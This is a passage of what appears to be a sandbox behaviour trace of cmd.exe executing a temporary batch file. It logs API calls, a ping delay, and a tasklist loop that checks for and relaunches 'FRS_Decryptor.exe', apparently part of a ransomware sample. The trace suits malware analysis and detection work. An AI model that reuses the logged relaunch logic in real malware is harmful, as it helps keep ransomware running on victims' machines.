_String2="DEL") returned 12 [0130.688] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0130.688] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0130.688] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0130.688] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0130.688] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0130.688] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0130.688] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0130.688] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0130.688] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0130.688] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0130.688] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0130.688] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0130.689] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0130.689] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0130.689] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0130.689] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0130.689] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0130.689] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0130.689] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0130.689] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0130.689] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0130.689] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0130.689] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0130.689] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0130.689] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0130.689] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0130.689] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0130.689] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0130.689] _wcsicmp (_String1="ping", _String2="START") returned -3 [0130.689] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0130.689] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0130.689] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0130.689] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0130.689] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0130.689] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0130.689] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0130.689] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0130.689] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0130.689] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0130.689] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0130.689] SetErrorMode (uMode=0x0) returned 0x0 [0130.689] SetErrorMode (uMode=0x1) returned 0x0 [0130.689] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd67ba0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0130.689] SetErrorMode (uMode=0x0) returned 0x1 [0130.689] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.689] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.689] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.689] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.689] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0130.689] GetLastError () returned 0x2 [0130.689] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.690] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ff0 [0130.690] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0130.690] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0130.690] GetLastError () returned 0x2 [0130.690] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59b30 [0130.690] FindClose (in: hFindFile=0xd59b30 | out: hFindFile=0xd59b30) returned 1 [0130.690] GetFileType (hFile=0x28) returned 0x2 [0130.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0130.690] _dup (_FileHandle=1) returned 3 [0130.690] _close (_FileHandle=1) returned 0 [0130.690] _wcsicmp (_String1="nul", _String2="con") returned 11 [0130.690] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0130.690] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0130.690] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0130.690] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0130.691] SetErrorMode (uMode=0x0) returned 0x0 [0130.691] SetErrorMode (uMode=0x1) returned 0x0 [0130.691] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0130.691] SetErrorMode (uMode=0x0) returned 0x1 [0130.691] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.691] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.691] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.691] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.691] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0130.691] GetLastError () returned 0x2 [0130.691] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.691] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a1f0 [0130.691] FindClose (in: hFindFile=0xd5a1f0 | out: hFindFile=0xd5a1f0) returned 1 [0130.691] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0130.691] GetLastError () returned 0x2 [0130.691] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a170 [0130.691] FindClose (in: hFindFile=0xd5a170 | out: hFindFile=0xd5a170) returned 1 [0130.691] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0130.692] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0130.692] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0130.692] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.692] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.692] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0130.692] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2b0, hThread=0x2e8, dwProcessId=0x22c, dwThreadId=0x988)) returned 1 [0130.695] CloseHandle (hObject=0x2e8) returned 1 [0130.695] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.695] GetEnvironmentStringsW () returned 0xd30508* [0130.695] FreeEnvironmentStringsA (penv="=") returned 1 [0130.695] WaitForSingleObject (hHandle=0x2b0, dwMilliseconds=0xffffffff) returned 0x0 [0132.768] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0132.768] CloseHandle (hObject=0x2b0) returned 1 [0132.769] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0132.769] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.769] GetEnvironmentStringsW () returned 0xd7e510* [0132.769] FreeEnvironmentStringsA (penv="=") returned 1 [0132.769] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.769] GetEnvironmentStringsW () returned 0xd30508* [0132.769] FreeEnvironmentStringsA (penv="=") returned 1 [0132.769] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0132.769] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0132.769] _close (_FileHandle=3) returned 0 [0132.769] _get_osfhandle (_FileHandle=1) returned 0x28 [0132.769] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0132.769] _get_osfhandle (_FileHandle=1) returned 0x28 [0132.769] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0132.769] _get_osfhandle (_FileHandle=0) returned 0x24 [0132.770] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0132.770] SetConsoleInputExeNameW () returned 0x1 [0132.770] GetConsoleOutputCP () returned 0x1b5 [0132.770] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0132.770] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.770] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0132.770] _open_osfhandle (_OSFileHandle=0x154, _Flags=8) returned 3 [0132.770] _get_osfhandle (_FileHandle=3) returned 0x154 [0132.770] SetFilePointer (in: hFile=0x154, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0132.770] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0132.770] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0132.770] SetFilePointer (in: hFile=0x154, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0132.770] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0132.770] GetFileType (hFile=0x154) returned 0x1 [0132.770] _get_osfhandle (_FileHandle=3) returned 0x154 [0132.770] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0132.770] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0132.770] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0132.771] SetFilePointer (in: hFile=0x154, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0132.771] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0132.771] GetFileType (hFile=0x154) returned 0x1 [0132.771] _get_osfhandle (_FileHandle=3) returned 0x154 [0132.771] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0132.771] _tell (_FileHandle=3) returned 2627 [0132.771] _close (_FileHandle=3) returned 0 [0132.771] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0132.771] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0132.771] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0132.771] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0132.771] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0132.775] feof (_File=0x76ea4c68) returned 0 [0132.775] ferror (_File=0x76ea4c68) returned 0 [0132.775] fgets (in: _Buf=0xd83208, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0133.263] feof (_File=0x76ea4c68) returned 0 [0133.263] ferror (_File=0x76ea4c68) returned 0 [0133.263] fgets (in: _Buf=0xd8525e, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0133.298] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0133.299] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43d56, cbMultiByte=78, lpWideCharStr=0xd43d08, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0133.299] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0133.299] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0133.299] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0133.300] _open_osfhandle (_OSFileHandle=0x2ec, _Flags=8) returned 3 [0133.300] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0133.300] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.300] GetFileSize (in: hFile=0x2ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0133.300] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0133.300] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0133.300] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.300] GetFileType (hFile=0x2ec) returned 0x1 [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0133.300] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0133.300] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0133.300] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.300] GetFileType (hFile=0x2ec) returned 0x1 [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0133.300] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0133.300] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0133.300] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.300] GetFileType (hFile=0x2ec) returned 0x1 [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0133.300] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.300] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.300] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.300] GetFileType (hFile=0x2ec) returned 0x1 [0133.300] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.301] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0133.301] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0133.301] _get_osfhandle (_FileHandle=3) returned 0x2ec [0133.301] GetFileType (hFile=0x2ec) returned 0x1 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0133.301] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0133.301] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0133.301] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 